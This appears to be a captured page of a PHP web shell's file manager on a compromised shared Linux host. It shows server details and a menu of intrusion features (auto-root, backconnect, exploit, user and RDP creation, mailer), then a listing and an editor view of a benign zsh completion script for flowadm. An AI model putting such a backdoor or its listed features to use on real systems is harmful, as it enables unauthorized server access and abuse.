Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
Solaris /
[ HOME SHELL ]
Name
Size
Permission
Action
_be_name
341
B
-rw-r--r--
_beadm
2
KB
-rw-r--r--
_coreadm
1.45
KB
-rw-r--r--
_dhcpinfo
1.17
KB
-rw-r--r--
_dladm
27.48
KB
-rw-r--r--
_dtrace
2.07
KB
-rw-r--r--
_dumpadm
866
B
-rw-r--r--
_flowadm
2.69
KB
-rw-r--r--
_fmadm
2.8
KB
-rw-r--r--
_inetadm
406
B
-rw-r--r--
_ipadm
12.31
KB
-rw-r--r--
_pfexec
751
B
-rw-r--r--
_pkg5
12.15
KB
-rw-r--r--
_prstat
1.79
KB
-rw-r--r--
_ptree
209
B
-rw-r--r--
_savecore
228
B
-rw-r--r--
_snoop
1.45
KB
-rw-r--r--
_svcadm
1.79
KB
-rw-r--r--
_svccfg
3.87
KB
-rw-r--r--
_svcprop
793
B
-rw-r--r--
_svcs
1.12
KB
-rw-r--r--
_svcs_fmri
2.83
KB
-rw-r--r--
_zlogin
472
B
-rw-r--r--
_zoneadm
3.97
KB
-rw-r--r--
_zones
256
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _flowadm
#compdef flowadm local -a subcmds tr props local expl _flowadm_flow(){ compadd "$@" - $(_call_program flows flowadm show-flow -p -o flow) } subcmds=( help show-flow add-flow match-flow remove-flow set-flowprop reset-flowprop show-flowprop ) tr=( tcp udp sctp icmp icmpv6 ) props=( maxbw ) if [[ $service == "flowadm" ]]; then _arguments -C -A "-*" \ '*::command:->subcmd' && return 0 if (( CURRENT == 1 )); then _wanted commands expl "flowadm subcommand" compadd -a subcmds return fi service="$words[1]" curcontext="${curcontext%:*}-$service:" fi case $service in ("help") _arguments ':subcommand:($subcmds)' ;; ("show-flow") _arguments -A "-*" \ '-o[specify field to display]:field:(flow link ipaddr proto port dsfield)' \ '-p[parsable output]' \ '-P[persistent flow property information]' \ - set1 \ '-l[display information for link]:link or flow:_net_interfaces' \ - set2 \ ':flow:_flowadm_flow' \ ;; (match-flow) _arguments -A "-*" \ '-o[specify field to display]:field:(flow link ipaddr proto port dsfield)' \ '-p[parsable output]' \ '-P[persistent flow property information]' \ '-a[specify attribute]:attribute:(local_ip= remote_ip= transport=$tr local_port= dsfield=)' \ '(:)-l[display information for link]:link or flow:_net_interfaces' \ '(-l):flow:_flowadm_flow' \ ;; ("add-flow") _arguments -A "-*" \ '-t[temporary changes - do not persist across reboots]' \ '-R[alternate root dir]:alternate root:_files' \ '-l[specify link to which flow will be added]:link:_net_interfaces' \ '-a[specify attribute]:attribute:(local_ip= remote_ip= transport=$tr local_port= dsfield=)' \ '-p[set property value]:property:(maxbw=)' \ ;; ("remove-flow") _arguments -A "-*" \ '-t[temporary changes - do not persist across reboots]' \ '-R[alternate root dir]:alternate root:_files' \ - set1 \ '-l[specify link from which flow will be deleted]:link:_net_interfaces' \ - set2 \ ':flow:_flowadm_flow' \ ;; ("set-flowprop") _arguments -A "-*" \ '-t[temporary changes - do not persist across reboots]' \ '-R[alternate root dir]:alternate root:_files' \ '-p[set property value]:property:(maxbw=)' \ ':flow:_flowadm_flow' \ ;; ("reset-flowprop") _arguments -A "-*" \ '-t[temporary changes - do not persist across reboots]' \ '-R[alternate root dir]:alternate root:_files' \ '-p[set property value]:property:(maxbw=)' \ ':flow:_flowadm_flow' \ ;; ("show-flowprop") _arguments -A "-*" \ '-c[parsable output (requires -o)]' \ '-l[specify link whose properties will be shown]:link:_net_interfaces' \ '-P[persistent flow property information]' \ '-p[property to show]:property:_values -s , "property" $props' \ ':flow:_flowadm_flow' \ ;; esac
Close